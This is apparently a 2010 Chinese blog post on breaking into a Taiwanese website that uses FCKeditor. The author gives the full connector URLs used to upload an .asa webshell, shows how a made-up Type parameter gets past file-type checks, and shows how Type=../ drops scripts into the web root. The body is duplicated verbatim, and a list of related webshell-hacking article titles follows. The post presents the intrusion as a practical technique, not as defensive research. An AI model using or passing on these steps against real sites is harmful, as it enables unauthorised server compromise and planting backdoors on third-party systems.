FCKeditor系统拿webshell
2010-03-24 18:17
183 查看
晚上和宝看个台湾的站,后台套用的是FCKeditor的系统.
这貌似是个全世界都在用的编辑系统,什么韩国日本台湾美国的站都在用
再***的时候,宝发现的心得我记录下:
http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
打开这个地址就可以上传任何类型的文件了,我和宝上传的是.asa的,在编辑器的目录下正常的显示出了马.
但一时间找不到上传地址,后来经过推断,确定马儿上传到的位置是:
http://www.xxx.tw/UserFiles/all/1.asa
经过我们的思路整理,得出了 "Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.
比如输入:
http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=cnandbaol&Connector=connectors/asp/connector.asp
所传的文件就到了 http://www.xxx.tw/UserFiles/cnandbao/下了
经过进一步的考虑,
如果这样输入:http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
就可以传到网站的根目录下,这样只要网站支持什么脚本,你传什么脚本的马就可以了.
所传的文件就到了网站根目录下了
这貌似是个全世界都在用的编辑系统,什么韩国日本台湾美国的站都在用
再***的时候,宝发现的心得我记录下:
http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
打开这个地址就可以上传任何类型的文件了,我和宝上传的是.asa的,在编辑器的目录下正常的显示出了马.
但一时间找不到上传地址,后来经过推断,确定马儿上传到的位置是:
http://www.xxx.tw/UserFiles/all/1.asa
经过我们的思路整理,得出了 "Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.
比如输入:
http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=cnandbaol&Connector=connectors/asp/connector.asp
所传的文件就到了 http://www.xxx.tw/UserFiles/cnandbao/下了
经过进一步的考虑,
如果这样输入:http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
就可以传到网站的根目录下,这样只要网站支持什么脚本,你传什么脚本的马就可以了.
所传的文件就到了网站根目录下了
相关文章推荐
- FCKeditor系统拿webshell
- mssql中public和db_owner权限下拿到webshell或者系统权限
- Linux系统下查找webshell后门的强大命令
- 手工注入,后台另类拿webshell搞定影院系统
- Fckeditor控件在文章发布系统中的应用
- mssql中public和db_owner权限下拿到webshell或者系统权限
- 论在mssql中public和db_owner权限下拿到webshell或者系统权限
- 实例(Smarty+FCKeditor新闻系统)
- Fckeditor上传图片出现“因为安全原因,文件不可浏览. 请联系系统管理员并检查CKFinder配置文件。”
- 论在mssql中public和db_owner权限下拿到webshell或者系统权限
- Thinksns微博系统注入漏洞即后台拿webshell
- 高版本正方教务系统上传后缀过滤不严导致能直接上传Webshell
- 利用系统保留文件名创建无法删除的webshell
- 一个注射点,一个webshell甚至系统权限
- Webshell与Serv-u结合获系统最高权限
- 系统的漏洞导致webshell攻击
- 实例(Smarty+FCKeditor新闻系统)
- 实例(Smarty+FCKeditor新闻系统)
- 利用新云网站管理系统漏洞成功获取某大型书店Webshell
- 实例(Smarty+FCKeditor新闻系统)